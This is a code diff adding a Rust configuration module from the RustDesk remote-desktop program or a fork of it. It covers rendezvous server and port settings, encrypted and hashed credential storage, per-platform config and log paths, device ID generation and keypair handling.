+    pub static ref ANDROID_RUSTLS_PLATFORM_VERIFIER_INITIALIZED: std::sync::atomic::AtomicBool = std::sync::atomic::AtomicBool::new(false);
+}
+
+lazy_static::lazy_static! {
+    pub static ref APP_DIR: RwLock<String> = Default::default();
+}
+
+#[cfg(any(target_os = "android", target_os = "ios"))]
+lazy_static::lazy_static! {
+    pub static ref APP_HOME_DIR: RwLock<String> = Default::default();
+}
+
+pub const LINK_DOCS_HOME: &str = "https://rustdesk.com/docs/en/";
+pub const LINK_DOCS_X11_REQUIRED: &str = "https://rustdesk.com/docs/en/manual/linux/#x11-required";
+pub const LINK_HEADLESS_LINUX_SUPPORT: &str =
+    "https://github.com/rustdesk/rustdesk/wiki/Headless-Linux-Support";
+
+lazy_static::lazy_static! {
+    pub static ref HELPER_URL: HashMap<&'static str, &'static str> = HashMap::from([
+        ("rustdesk docs home", LINK_DOCS_HOME),
+        ("rustdesk docs x11-required", LINK_DOCS_X11_REQUIRED),
+        ("rustdesk x11 headless", LINK_HEADLESS_LINUX_SUPPORT),
+        ]);
+}
+
+const NUM_CHARS: &[char] = &['0', '1', '2', '3', '4', '5', '6', '7', '8', '9'];
+
+const CHARS: &[char] = &[
+    '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k',
+    'm', 'n', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',
+];
+
+pub const RENDEZVOUS_SERVERS: &[&str] = &["rustdesk.ykpt.cc"];
+pub const RS_PUB_KEY: &str = "YQOFSGjkL8R7D+QojRUu9qjC7vaUahwq71nQ2TaPS9Q=";
+
+pub const RENDEZVOUS_PORT: i32 = 21116;
+pub const RELAY_PORT: i32 = 21117;
+pub const WS_RENDEZVOUS_PORT: i32 = 21118;
+pub const WS_RELAY_PORT: i32 = 21119;
+
+macro_rules! serde_field_string {
+    ($default_func:ident, $de_func:ident, $default_expr:expr) => {
+        fn $default_func() -> String {
+            $default_expr
+        }
+
+        fn $de_func<'de, D>(deserializer: D) -> Result<String, D::Error>
+        where
+            D: de::Deserializer<'de>,
+        {
+            let s: String =
+                de::Deserialize::deserialize(deserializer).unwrap_or(Self::$default_func());
+            if s.is_empty() {
+                return Ok(Self::$default_func());
+            }
+            Ok(s)
+        }
+    };
+}
+
+macro_rules! serde_field_bool {
+    ($struct_name: ident, $field_name: literal, $func: ident, $default: literal) => {
+        #[derive(Debug, Clone, PartialEq, Serialize, Deserialize)]
+        pub struct $struct_name {
+            #[serde(default = $default, rename = $field_name, deserialize_with = "deserialize_bool")]
+            pub v: bool,
+        }
+        impl Default for $struct_name {
+            fn default() -> Self {
+                Self { v: Self::$func() }
+            }
+        }
+        impl $struct_name {
+            pub fn $func() -> bool {
+                UserDefaultConfig::read($field_name) == "Y"
+            }
+        }
+        impl Deref for $struct_name {
+            type Target = bool;
+
+            fn deref(&self) -> &Self::Target {
+                &self.v
+            }
+        }
+        impl DerefMut for $struct_name {
+            fn deref_mut(&mut self) -> &mut Self::Target {
+                &mut self.v
+            }
+        }
+    };
+}
+
+#[derive(Clone, Copy, PartialEq, Eq, Debug)]
+pub enum NetworkType {
+    Direct,
+    ProxySocks,
+}
+
+#[derive(Debug, Default, Serialize, Deserialize, Clone, PartialEq)]
+pub struct Config {
+    #[serde(
+        default,
+        skip_serializing_if = "String::is_empty",
+        deserialize_with = "deserialize_string"
+    )]
+    pub id: String, // use
+    #[serde(default, deserialize_with = "deserialize_string")]
+    enc_id: String, // store
+    #[serde(default, deserialize_with = "deserialize_string")]
+    password: String,
+    #[serde(default, deserialize_with = "deserialize_string")]
+    salt: String,
+    #[serde(default, deserialize_with = "deserialize_keypair")]
+    key_pair: KeyPair, // sk, pk
+    #[serde(default, deserialize_with = "deserialize_bool")]
+    key_confirmed: bool,
+    #[serde(default, deserialize_with = "deserialize_hashmap_string_bool")]
+    keys_confirmed: HashMap<String, bool>,
+}
+
+#[derive(Debug, Default, PartialEq, Serialize, Deserialize, Clone)]
+pub struct Socks5Server {
+    #[serde(default, deserialize_with = "deserialize_string")]
+    pub proxy: String,
+    #[serde(default, deserialize_with = "deserialize_string")]
+    pub username: String,
+    #[serde(default, deserialize_with = "deserialize_string")]
+    pub password: String,
+}
+
+// more variable configs
+#[derive(Debug, Default, Serialize, Deserialize, Clone, PartialEq)]
+pub struct Config2 {
+    #[serde(default, deserialize_with = "deserialize_string")]
+    rendezvous_server: String,
+    #[serde(default, deserialize_with = "deserialize_i32")]
+    nat_type: i32,
+    #[serde(default, deserialize_with = "deserialize_i32")]
+    serial: i32,
+    #[serde(default, deserialize_with = "deserialize_string")]
+    unlock_pin: String,
+    #[serde(default, deserialize_with = "deserialize_string")]
+    trusted_devices: String,
+
+    #[serde(default)]
+    socks: Option<Socks5Server>,
+
+    // the other scalar value must before this
+    #[serde(default, deserialize_with = "deserialize_hashmap_string_string")]
+    pub options: HashMap<String, String>,
+}
+
+#[derive(Debug, Default, Serialize, Deserialize, Clone, PartialEq)]
+pub struct Resolution {
+    pub w: i32,
+    pub h: i32,
+}
+
+#[derive(Debug, Serialize, Deserialize, Clone, PartialEq)]
+pub struct PeerConfig {
+    #[serde(default, deserialize_with = "deserialize_vec_u8")]
+    pub password: Vec<u8>,
+    #[serde(default, deserialize_with = "deserialize_size")]
+    pub size: Size,
+    #[serde(default, deserialize_with = "deserialize_size")]
+    pub size_ft: Size,
+    #[serde(default, deserialize_with = "deserialize_size")]
+    pub size_pf: Size,
+    #[serde(
+        default = "PeerConfig::default_view_style",
+        deserialize_with = "PeerConfig::deserialize_view_style",
+        skip_serializing_if = "String::is_empty"
+    )]
+    pub view_style: String,
+    // Image scroll style, scrolledge, scrollbar or scroll auto
+    #[serde(
+        default = "PeerConfig::default_scroll_style",
+        deserialize_with = "PeerConfig::deserialize_scroll_style",
+        skip_serializing_if = "String::is_empty"
+    )]
+    pub scroll_style: String,
+    #[serde(
+        default = "PeerConfig::default_edge_scroll_edge_thickness",
+        deserialize_with = "PeerConfig::deserialize_edge_scroll_edge_thickness"
+    )]
+    pub edge_scroll_edge_thickness: i32,
+    #[serde(
+        default = "PeerConfig::default_image_quality",
+        deserialize_with = "PeerConfig::deserialize_image_quality",
+        skip_serializing_if = "String::is_empty"
+    )]
+    pub image_quality: String,
+    #[serde(
+        default = "PeerConfig::default_custom_image_quality",
+        deserialize_with = "PeerConfig::deserialize_custom_image_quality",
+        skip_serializing_if = "Vec::is_empty"
+    )]
+    pub custom_image_quality: Vec<i32>,
+    #[serde(flatten)]
+    pub show_remote_cursor: ShowRemoteCursor,
+    #[serde(flatten)]
+    pub lock_after_session_end: LockAfterSessionEnd,
+    #[serde(flatten)]
+    pub terminal_persistent: TerminalPersistent,
+    #[serde(flatten)]
+    pub privacy_mode: PrivacyMode,
+    #[serde(flatten)]
+    pub allow_swap_key: AllowSwapKey,
+    #[serde(default, deserialize_with = "deserialize_vec_i32_string_i32")]
+    pub port_forwards: Vec<(i32, String, i32)>,
+    #[serde(default, deserialize_with = "deserialize_i32")]
+    pub direct_failures: i32,
+    #[serde(flatten)]
+    pub disable_audio: DisableAudio,
+    #[serde(flatten)]
+    pub disable_clipboard: DisableClipboard,
+    #[serde(flatten)]
+    pub enable_file_copy_paste: EnableFileCopyPaste,
+    #[serde(flatten)]
+    pub show_quality_monitor: ShowQualityMonitor,
+    #[serde(flatten)]
+    pub follow_remote_cursor: FollowRemoteCursor,
+    #[serde(flatten)]
+    pub follow_remote_window: FollowRemoteWindow,
+    #[serde(
+        default,
+        deserialize_with = "deserialize_string",
+        skip_serializing_if = "String::is_empty"
+    )]
+    pub keyboard_mode: String,
+    #[serde(flatten)]
+    pub view_only: ViewOnly,
+    #[serde(flatten)]
+    pub show_my_cursor: ShowMyCursor,
+    #[serde(flatten)]
+    pub sync_init_clipboard: SyncInitClipboard,
+    // Mouse wheel or touchpad scroll mode
+    #[serde(
+        default = "PeerConfig::default_reverse_mouse_wheel",
+        deserialize_with = "PeerConfig::deserialize_reverse_mouse_wheel",
+        skip_serializing_if = "String::is_empty"
+    )]
+    pub reverse_mouse_wheel: String,
+    #[serde(
+        default = "PeerConfig::default_displays_as_individual_windows",
+        deserialize_with = "PeerConfig::deserialize_displays_as_individual_windows",
+        skip_serializing_if = "String::is_empty"
+    )]
+    pub displays_as_individual_windows: String,
+    #[serde(
+        default = "PeerConfig::default_use_all_my_displays_for_the_remote_session",
+        deserialize_with = "PeerConfig::deserialize_use_all_my_displays_for_the_remote_session",
+        skip_serializing_if = "String::is_empty"
+    )]
+    pub use_all_my_displays_for_the_remote_session: String,
+    #[serde(
+        rename = "trackpad-speed",
+        default = "PeerConfig::default_trackpad_speed",
+        deserialize_with = "PeerConfig::deserialize_trackpad_speed"
+    )]
+    pub trackpad_speed: i32,
+
+    #[serde(
+        default,
+        deserialize_with = "deserialize_hashmap_resolutions",
+        skip_serializing_if = "HashMap::is_empty"
+    )]
+    pub custom_resolutions: HashMap<String, Resolution>,
+
+    // The other scalar value must before this
+    #[serde(
+        default,
+        deserialize_with = "deserialize_hashmap_string_string",
+        skip_serializing_if = "HashMap::is_empty"
+    )]
+    pub options: HashMap<String, String>, // not use delete to represent default values
+    // Various data for flutter ui
+    #[serde(default, deserialize_with = "deserialize_hashmap_string_string")]
+    pub ui_flutter: HashMap<String, String>,
+    #[serde(default)]
+    pub info: PeerInfoSerde,
+    #[serde(default)]
+    pub transfer: TransferSerde,
+}
+
+impl Default for PeerConfig {
+    fn default() -> Self {
+        Self {
+            password: Default::default(),
+            size: Default::default(),
+            size_ft: Default::default(),
+            size_pf: Default::default(),
+            view_style: Self::default_view_style(),
+            scroll_style: Self::default_scroll_style(),
+            edge_scroll_edge_thickness: Self::default_edge_scroll_edge_thickness(),
+            image_quality: Self::default_image_quality(),
+            custom_image_quality: Self::default_custom_image_quality(),
+            show_remote_cursor: Default::default(),
+            lock_after_session_end: Default::default(),
+            terminal_persistent: Default::default(),
+            privacy_mode: Default::default(),
+            allow_swap_key: Default::default(),
+            port_forwards: Default::default(),
+            direct_failures: Default::default(),
+            disable_audio: Default::default(),
+            disable_clipboard: Default::default(),
+            enable_file_copy_paste: Default::default(),
+            show_quality_monitor: Default::default(),
+            follow_remote_cursor: Default::default(),
+            follow_remote_window: Default::default(),
+            keyboard_mode: Default::default(),
+            view_only: Default::default(),
+            show_my_cursor: Default::default(),
+            reverse_mouse_wheel: Self::default_reverse_mouse_wheel(),
+            displays_as_individual_windows: Self::default_displays_as_individual_windows(),
+            use_all_my_displays_for_the_remote_session:
+                Self::default_use_all_my_displays_for_the_remote_session(),
+            trackpad_speed: Self::default_trackpad_speed(),
+            custom_resolutions: Default::default(),
+            options: Self::default_options(),
+            ui_flutter: Default::default(),
+            info: Default::default(),
+            transfer: Default::default(),
+            sync_init_clipboard: Default::default(),
+        }
+    }
+}
+
+#[derive(Debug, PartialEq, Default, Serialize, Deserialize, Clone)]
+pub struct PeerInfoSerde {
+    #[serde(default, deserialize_with = "deserialize_string")]
+    pub username: String,
+    #[serde(default, deserialize_with = "deserialize_string")]
+    pub hostname: String,
+    #[serde(default, deserialize_with = "deserialize_string")]
+    pub platform: String,
+}
+
+#[derive(Debug, Default, Serialize, Deserialize, Clone, PartialEq)]
+pub struct TransferSerde {
+    #[serde(default, deserialize_with = "deserialize_vec_string")]
+    pub write_jobs: Vec<String>,
+    #[serde(default, deserialize_with = "deserialize_vec_string")]
+    pub read_jobs: Vec<String>,
+}
+
+#[inline]
+pub fn get_online_state() -> i64 {
+    *ONLINE.lock().unwrap().values().max().unwrap_or(&0)
+}
+
+#[cfg(not(any(target_os = "android", target_os = "ios")))]
+fn patch(path: PathBuf) -> PathBuf {
+    if let Some(_tmp) = path.to_str() {
+        #[cfg(windows)]
+        return _tmp
+            .replace(
+                "system32\\config\\systemprofile",
+                "ServiceProfiles\\LocalService",
+            )
+            .into();
+        #[cfg(target_os = "macos")]
+        return _tmp.replace("Application Support", "Preferences").into();
+        #[cfg(target_os = "linux")]
+        {
+            if _tmp == "/root" {
+                if let Ok(user) = crate::platform::linux::run_cmds_trim_newline("whoami") {
+                    if user != "root" {
+                        let cmd = format!("getent passwd '{}' | awk -F':' '{{print $6}}'", user);
+                        if let Ok(output) = crate::platform::linux::run_cmds_trim_newline(&cmd) {
+                            return output.into();
+                        }
+                        return format!("/home/{user}").into();
+                    }
+                }
+            }
+        }
+    }
+    path
+}
+
+impl Config2 {
+    fn load() -> Config2 {
+        let mut config = Config::load_::<Config2>("2");
+        let mut store = false;
+        if let Some(mut socks) = config.socks {
+            let (password, _, store2) =
+                decrypt_str_or_original(&socks.password, PASSWORD_ENC_VERSION);
+            socks.password = password;
+            config.socks = Some(socks);
+            store |= store2;
+        }
+        let (unlock_pin, _, store2) =
+            decrypt_str_or_original(&config.unlock_pin, PASSWORD_ENC_VERSION);
+        config.unlock_pin = unlock_pin;
+        store |= store2;
+        if store {
+            config.store();
+        }
+        config
+    }
+
+    pub fn file() -> PathBuf {
+        Config::file_("2")
+    }
+
+    fn store(&self) {
+        let mut config = self.clone();
+        if let Some(mut socks) = config.socks {
+            socks.password =
+                encrypt_str_or_original(&socks.password, PASSWORD_ENC_VERSION, ENCRYPT_MAX_LEN);
+            config.socks = Some(socks);
+        }
+        config.unlock_pin =
+            encrypt_str_or_original(&config.unlock_pin, PASSWORD_ENC_VERSION, ENCRYPT_MAX_LEN);
+        Config::store_(&config, "2");
+    }
+
+    pub fn get() -> Config2 {
+        return CONFIG2.read().unwrap().clone();
+    }
+
+    pub fn set(cfg: Config2) -> bool {
+        let mut lock = CONFIG2.write().unwrap();
+        if *lock == cfg {
+            return false;
+        }
+        *lock = cfg;
+        lock.store();
+        true
+    }
+}
+
+pub fn load_path<T: serde::Serialize + serde::de::DeserializeOwned + Default + std::fmt::Debug>(
+    file: PathBuf,
+) -> T {
+    let cfg = match confy::load_path(&file) {
+        Ok(config) => config,
+        Err(err) => {
+            if let confy::ConfyError::GeneralLoadError(err) = &err {
+                if err.kind() == std::io::ErrorKind::NotFound {
+                    return T::default();
+                }
+            }
+            log::error!("Failed to load config '{}': {}", file.display(), err);
+            T::default()
+        }
+    };
+    cfg
+}
+
+#[inline]
+pub fn store_path<T: serde::Serialize>(path: PathBuf, cfg: T) -> crate::ResultType<()> {
+    #[cfg(not(windows))]
+    {
+        use std::os::unix::fs::PermissionsExt;
+        Ok(confy::store_path_perms(
+            path,
+            cfg,
+            fs::Permissions::from_mode(0o600),
+        )?)
+    }
+    #[cfg(windows)]
+    {
+        Ok(confy::store_path(path, cfg)?)
+    }
+}
+
+impl Config {
+    fn load_<T: serde::Serialize + serde::de::DeserializeOwned + Default + std::fmt::Debug>(
+        suffix: &str,
+    ) -> T {
+        let file = Self::file_(suffix);
+        let cfg = load_path(file);
+        if suffix.is_empty() {
+            log::trace!("{:?}", cfg);
+        }
+        cfg
+    }
+
+    fn store_<T: serde::Serialize>(config: &T, suffix: &str) {
+        let file = Self::file_(suffix);
+        if let Err(err) = store_path(file, config) {
+            log::error!("Failed to store {suffix} config: {err}");
+        }
+    }
+
+    fn load() -> Config {
+        let mut config = Config::load_::<Config>("");
+        let mut store = false;
+        store |= Self::migrate_permanent_password_to_hashed_storage(&mut config);
+        let mut id_valid = false;
+        let (id, encrypted, store2) = decrypt_str_or_original(&config.enc_id, PASSWORD_ENC_VERSION);
+        if encrypted {
+            config.id = id;
+            id_valid = true;
+            store |= store2;
+        } else if
+        // Comment out for forward compatible
+        // crate::get_modified_time(&Self::file_(""))
+        // .checked_sub(std::time::Duration::from_secs(30)) // allow modification during installation
+        // .unwrap_or_else(crate::get_exe_time)
+        // < crate::get_exe_time()
+        // &&
+        !config.id.is_empty()
+            && config.enc_id.is_empty()
+            && !decrypt_str_or_original(&config.id, PASSWORD_ENC_VERSION).1
+        {
+            id_valid = true;
+            store = true;
+        }
+        if !id_valid {
+            log::warn!("ID is invalid, generating new one");
+            for _ in 0..3 {
+                if let Some(id) = Config::gen_id() {
+                    config.id = id;
+                    store = true;
+                    break;
+                } else {
+                    log::error!("Failed to generate new id");
+                }
+            }
+        }
+        if store {
+            config.store();
+        }
+        config
+    }
+
+    fn migrate_permanent_password_to_hashed_storage(config: &mut Config) -> bool {
+        if config.password.is_empty() || is_permanent_password_hashed_storage(&config.password) {
+            return false;
+        }
+
+        if config.password.starts_with(PASSWORD_ENC_VERSION) {
+            let (plain, decrypted, looks_like_plaintext) =
+                decrypt_str_or_original(&config.password, PASSWORD_ENC_VERSION);
+            // `decrypt_str_or_original` returns (value, decrypted_ok, should_store).
+            // If the value looks like an encrypted payload ("00" + base64 with MAC) but cannot be
+            // decrypted on this machine, it is most likely copied from another device or corrupted.
+            // In normal single-machine setups this should be extremely rare, so keep it as-is.
+            if !decrypted && !looks_like_plaintext {
+                return false;
+            }
+            if config.salt.is_empty() {
+                config.salt = Config::get_auto_password(DEFAULT_SALT_LEN);
+            }
+            if is_permanent_password_hashed_storage(&plain) {
+                config.password = plain;
+                return true;
+            }
+            let h1 = compute_permanent_password_h1(&plain, &config.salt);
+            config.password = encode_permanent_password_storage_from_h1(&h1);
+            return true;
+        }
+
+        if config.salt.is_empty() {
+            config.salt = Config::get_auto_password(DEFAULT_SALT_LEN);
+        }
+        let h1 = compute_permanent_password_h1(&config.password, &config.salt);
+        config.password = encode_permanent_password_storage_from_h1(&h1);
+        true
+    }
+
+    fn store(&self) {
+        let mut config = self.clone();
+        Self::migrate_permanent_password_to_hashed_storage(&mut config);
+        config.enc_id = encrypt_str_or_original(&config.id, PASSWORD_ENC_VERSION, ENCRYPT_MAX_LEN);
+        config.id = "".to_owned();
+        Config::store_(&config, "");
+    }
+
+    pub fn file() -> PathBuf {
+        Self::file_("")
+    }
+
+    fn file_(suffix: &str) -> PathBuf {
+        let name = format!("{}{}", *APP_NAME.read().unwrap(), suffix);
+        Config::with_extension(Self::path(name))
+    }
+
+    pub fn is_empty(&self) -> bool {
+        (self.id.is_empty() && self.enc_id.is_empty()) || self.key_pair.0.is_empty()
+    }
+
+    /// Get the user's home directory for configuration purposes.
+    ///
+    /// # Security Note
+    /// This function uses `dirs_next::home_dir()` which reads the `$HOME` environment
+    /// variable on Unix systems. This is acceptable for user-space operations (config
+    /// file storage, logging) where the user may intentionally redirect their home
+    /// directory.
+    ///
+    /// **DO NOT use this function in privileged contexts** (e.g., code executed via
+    /// `gtk_sudo` or system services running as root). For privileged operations on
+    /// Linux, use `crate::platform::linux::get_home_dir_trusted()` which bypasses
+    /// the `$HOME` environment variable and queries the system password database
+    /// directly via `getpwuid`.
+    ///
+    /// Using `$HOME` in privileged contexts creates a confused-deputy vulnerability
+    /// where an attacker can manipulate the environment variable to inject malicious
+    /// paths into privileged operations.
+    pub fn get_home() -> PathBuf {
+        #[cfg(any(target_os = "android", target_os = "ios"))]
+        return PathBuf::from(APP_HOME_DIR.read().unwrap().as_str());
+        #[cfg(not(any(target_os = "android", target_os = "ios")))]
+        {
+            if let Some(path) = dirs_next::home_dir() {
+                patch(path)
+            } else if let Ok(path) = std::env::current_dir() {
+                path
+            } else {
+                std::env::temp_dir()
+            }
+        }
+    }
+
+    pub fn path<P: AsRef<Path>>(p: P) -> PathBuf {
+        #[cfg(any(target_os = "android", target_os = "ios"))]
+        {
+            let mut path: PathBuf = APP_DIR.read().unwrap().clone().into();
+            path.push(p);
+            return path;
+        }
+        #[cfg(not(any(target_os = "android", target_os = "ios")))]
+        {
+            #[cfg(not(target_os = "macos"))]
+            let org = "".to_owned();
+            #[cfg(target_os = "macos")]
+            let org = ORG.read().unwrap().clone();
+            // /var/root for root
+            if let Some(project) =
+                directories_next::ProjectDirs::from("", &org, &APP_NAME.read().unwrap())
+            {
+                let mut path = patch(project.config_dir().to_path_buf());
+                path.push(p);
+                return path;
+            }
+            "".into()
+        }
+    }
+
+    /// Get the log directory path.
+    ///
+    /// # Security Note
+    /// On macOS, this function uses `dirs_next::home_dir()` which reads the `$HOME`
+    /// environment variable. On Linux/Android, it uses `Self::get_home()`.
+    /// See [`Self::get_home()`] for security considerations regarding `$HOME` usage.
+    #[allow(unreachable_code)]
+    pub fn log_path() -> PathBuf {
+        #[cfg(target_os = "macos")]
+        {
+            if let Some(path) = dirs_next::home_dir().as_mut() {
+                path.push(format!("Library/Logs/{}", *APP_NAME.read().unwrap()));
+                return path.clone();
+            }
+        }
+        #[cfg(target_os = "linux")]
+        {
+            let mut path = Self::get_home();
+            path.push(format!(".local/share/logs/{}", *APP_NAME.read().unwrap()));
+            std::fs::create_dir_all(&path).ok();
+            return path;
+        }
+        #[cfg(target_os = "android")]
+        {
+            let mut path = Self::get_home();
+            path.push(format!("{}/Logs", *APP_NAME.read().unwrap()));
+            std::fs::create_dir_all(&path).ok();
+            return path;
+        }
+        if let Some(path) = Self::path("").parent() {
+            let mut path: PathBuf = path.into();
+            path.push("log");
+            return path;
+        }
+        "".into()
+    }
+
+    pub fn ipc_path(postfix: &str) -> String {
+        #[cfg(windows)]
+        {
+            // \\ServerName\pipe\PipeName
+            // where ServerName is either the name of a remote computer or a period, to specify the local computer.
+            // https://docs.microsoft.com/en-us/windows/win32/ipc/pipe-names
+            format!(
+                "\\\\.\\pipe\\{}\\query{}",
+                *APP_NAME.read().unwrap(),
+                postfix
+            )
+        }
+        #[cfg(not(windows))]
+        {
+            use std::os::unix::fs::PermissionsExt;
+            #[cfg(target_os = "android")]
+            let mut path: PathBuf =
+                format!("{}/{}", *APP_DIR.read().unwrap(), *APP_NAME.read().unwrap()).into();
+            #[cfg(not(target_os = "android"))]
+            let mut path: PathBuf = format!("/tmp/{}", *APP_NAME.read().unwrap()).into();
+            fs::create_dir(&path).ok();
+            fs::set_permissions(&path, fs::Permissions::from_mode(0o0777)).ok();
+            path.push(format!("ipc{postfix}"));
+            path.to_str().unwrap_or("").to_owned()
+        }
+    }
+
+    pub fn icon_path() -> PathBuf {
+        let mut path = Self::path("icons");
+        if fs::create_dir_all(&path).is_err() {
+            path = std::env::temp_dir();
+        }
+        path
+    }
+
+    #[inline]
+    pub fn get_any_listen_addr(is_ipv4: bool) -> SocketAddr {
+        if is_ipv4 {
+            SocketAddr::new(IpAddr::V4(Ipv4Addr::UNSPECIFIED), 0)
+        } else {
+            SocketAddr::new(IpAddr::V6(Ipv6Addr::UNSPECIFIED), 0)
+        }
+    }
+
+    pub fn get_rendezvous_server() -> String {
+        let mut rendezvous_server = EXE_RENDEZVOUS_SERVER.read().unwrap().clone();
+        if rendezvous_server.is_empty() {
+            rendezvous_server = Self::get_option("custom-rendezvous-server");
+        }
+        if rendezvous_server.is_empty() {
+            rendezvous_server = PROD_RENDEZVOUS_SERVER.read().unwrap().clone();
+        }
+        if rendezvous_server.is_empty() {
+            rendezvous_server = CONFIG2.read().unwrap().rendezvous_server.clone();
+        }
+        if rendezvous_server.is_empty() {
+            rendezvous_server = Self::get_rendezvous_servers()
+                .drain(..)
+                .next()
+                .unwrap_or_default();
+        }
+        if !rendezvous_server.contains(':') {
+            rendezvous_server = format!("{rendezvous_server}:{RENDEZVOUS_PORT}");
+        }
+        rendezvous_server
+    }
+
+    pub fn get_rendezvous_servers() -> Vec<String> {
+        let s = EXE_RENDEZVOUS_SERVER.read().unwrap().clone();
+        if !s.is_empty() {
+            return vec![s];
+        }
+        let s = Self::get_option("custom-rendezvous-server");
+        if !s.is_empty() {
+            return vec![s];
+        }
+        let s = PROD_RENDEZVOUS_SERVER.read().unwrap().clone();
+        if !s.is_empty() {
+            return vec![s];
+        }
+        let serial_obsolute = CONFIG2.read().unwrap().serial > SERIAL;
+        if serial_obsolute {
+            let ss: Vec<String> = Self::get_option("rendezvous-servers")
+                .split(',')
+                .filter(|x| x.contains('.'))
+                .map(|x| x.to_owned())
+                .collect();
+            if !ss.is_empty() {
+                return ss;
+            }
+        }
+        return RENDEZVOUS_SERVERS.iter().map(|x| x.to_string()).collect();
+    }
+
+    pub fn reset_online() {
+        *ONLINE.lock().unwrap() = Default::default();
+    }
+
+    pub fn update_latency(host: &str, latency: i64) {
+        ONLINE.lock().unwrap().insert(host.to_owned(), latency);
+        let mut host = "".to_owned();
+        let mut delay = i64::MAX;
+        for (tmp_host, tmp_delay) in ONLINE.lock().unwrap().iter() {
+            if tmp_delay > &0 && tmp_delay < &delay {
+                delay = *tmp_delay;
+                host = tmp_host.to_string();
+            }
+        }
+        if !host.is_empty() {
+            let mut config = CONFIG2.write().unwrap();
+            if host != config.rendezvous_server {
+                log::debug!("Update rendezvous_server in config to {}", host);
+                log::debug!("{:?}", *ONLINE.lock().unwrap());
+                config.rendezvous_server = host;
+                config.store();
+            }
+        }
+    }
+
+    pub fn set_id(id: &str) {
+        let mut config = CONFIG.write().unwrap();
+        if id == config.id {
+            return;
+        }
+        config.id = id.into();
+        config.store();
+    }
+
+    pub fn set_nat_type(nat_type: i32) {
+        let mut config = CONFIG2.write().unwrap();
+        if nat_type == config.nat_type {
+            return;
+        }
+        config.nat_type = nat_type;
+        config.store();
+    }
+
+    pub fn get_nat_type() -> i32 {
+        CONFIG2.read().unwrap().nat_type
+    }
+
+    pub fn set_serial(serial: i32) {
+        let mut config = CONFIG2.write().unwrap();
+        if serial == config.serial {
+            return;
+        }
+        config.serial = serial;
+        config.store();
+    }
+
+    pub fn get_serial() -> i32 {
+        std::cmp::max(CONFIG2.read().unwrap().serial, SERIAL)
+    }
+
+    #[cfg(any(target_os = "android", target_os = "ios"))]
+    fn gen_id() -> Option<String> {
+        Self::get_auto_id()
+    }
+
+    #[cfg(not(any(target_os = "android", target_os = "ios")))]
+    fn gen_id() -> Option<String> {
+        let hostname_as_id = BUILTIN_SETTINGS
+            .read()
+            .unwrap()
+            .get(keys::OPTION_ALLOW_HOSTNAME_AS_ID)
+            .map(|v| option2bool(keys::OPTION_ALLOW_HOSTNAME_AS_ID, v))
+            .unwrap_or(false);
+        if hostname_as_id {
+            match whoami::fallible::hostname() {
+                Ok(h) => Some(h.replace(" ", "-")),
+                Err(e) => {
+                    log::warn!("Failed to get hostname, \"{}\", fallback to auto id", e);
+                    Self::get_auto_id()
+                }
+            }
+        } else {
+            Self::get_auto_id()
+        }
+    }
+
+    fn get_auto_id() -> Option<String> {
+        #[cfg(any(target_os = "android", target_os = "ios"))]
+        {
+            return Some(
+                rand::thread_rng()
+                    .gen_range(1_000_000_000..2_000_000_000)
+                    .to_string(),
+            );
+        }
+
+        #[cfg(not(any(target_os = "android", target_os = "ios")))]
+        {
+            let mut id = 0u32;
+            if let Ok(Some(ma)) = mac_address::get_mac_address() {
+                for x in &ma.bytes()[2..] {
+                    id = (id << 8) | (*x as u32);
+                }
+                id &= 0x1FFFFFFF;
+                log::info!("Generated id {}", id);
+                Some(id.to_string())
+            } else {
+                None
+            }
+        }
+    }
+
+    pub fn get_auto_password(length: usize) -> String {
+        Self::get_auto_password_with_chars(length, CHARS)
+    }
+
+    pub fn get_auto_numeric_password(length: usize) -> String {
+        Self::get_auto_password_with_chars(length, NUM_CHARS)
+    }
+
+    fn get_auto_password_with_chars(length: usize, chars: &[char]) -> String {
+        let mut rng = rand::thread_rng();
+        (0..length)
+            .map(|_| chars[rng.gen::<usize>() % chars.len()])
+            .collect()
+    }
+
+    pub fn get_key_confirmed() -> bool {
+        CONFIG.read().unwrap().key_confirmed
+    }
+
+    pub fn set_key_confirmed(v: bool) {
+        let mut config = CONFIG.write().unwrap();
+        if config.key_confirmed == v {
+            return;
+        }
+        config.key_confirmed = v;
+        if !v {
+            config.keys_confirmed = Default::default();
+        }
+        config.store();
+    }
+
+    pub fn get_host_key_confirmed(host: &str) -> bool {
+        matches!(CONFIG.read().unwrap().keys_confirmed.get(host), Some(true))
+    }
+
+    pub fn set_host_key_confirmed(host: &str, v: bool) {
+        if Self::get_host_key_confirmed(host) == v {
+            return;
+        }
+        let mut config = CONFIG.write().unwrap();
+        config.keys_confirmed.insert(host.to_owned(), v);
+        config.store();
+    }
+
+    pub fn get_key_pair() -> KeyPair {
+        // lock here to make sure no gen_keypair more than once
+        // no use of CONFIG directly here to ensure no recursive calling in Config::load because of password dec which calling this function
+        let mut lock = KEY_PAIR.lock().unwrap();
+        if let Some(p) = lock.as_ref() {
+            return p.clone();
+        }
+        let mut config = Config::load_::<Config>("");
+        if config.key_pair.0.is_empty() {
+            log::info!("Generated new keypair for id: {}", config.id);
+            let (pk, sk) = sign::gen_keypair();
+            let key_pair = (sk.0.to_vec(), pk.0.into());
+            config.key_pair = key_pair.clone();
+            std::thread::spawn(|| {
+                let mut config = CONFIG.write().unwrap();
+                config.key_pair = key_pair;
+                config.store();
+            });
+        }
+        *lock = Some(config.key_pair.clone());
+        config.key_pair
+    }
+
+    pub fn get_cached_pk() -> Option<Vec<u8>> {
+        KEY_PAIR.lock().unwrap().clone().map(|k| k.1)
+    }
+
+    /// Get existing key pair without generating a new one.
+    /// Returns None if no key pair exists in cache or config file.
+    pub fn get_existing_key_pair() -> Option<KeyPair> {
+        let mut lock = KEY_PAIR.lock().unwrap();
+        if let Some(p) = lock.as_ref() {
+            return Some(p.clone());
+        }
+
+        // IMPORTANT: this path is called while holding KEY_PAIR lock.
+        // Config::load_ must remain a raw conf load/deserialize path and must never
+        // call decrypt_* / symmetric_crypt (directly or indirectly), otherwise this
+        // can re-enter key loading and deadlock.
+        let config = Config::load_::<Config>("");
+        if !config.key_pair.0.is_empty() {
+            *lock = Some(config.key_pair.clone());
+            Some(config.key_pair)
+        } else {
+            None
+        }
+    }
+
+    pub fn no_register_device() -> bool {
+        BUILTIN_SETTINGS
+            .read()
+            .unwrap()
+            .get(keys::OPTION_REGISTER_DEVICE)
+            .map(|v| v == "N")
+            .unwrap_or(false)
+    }
+
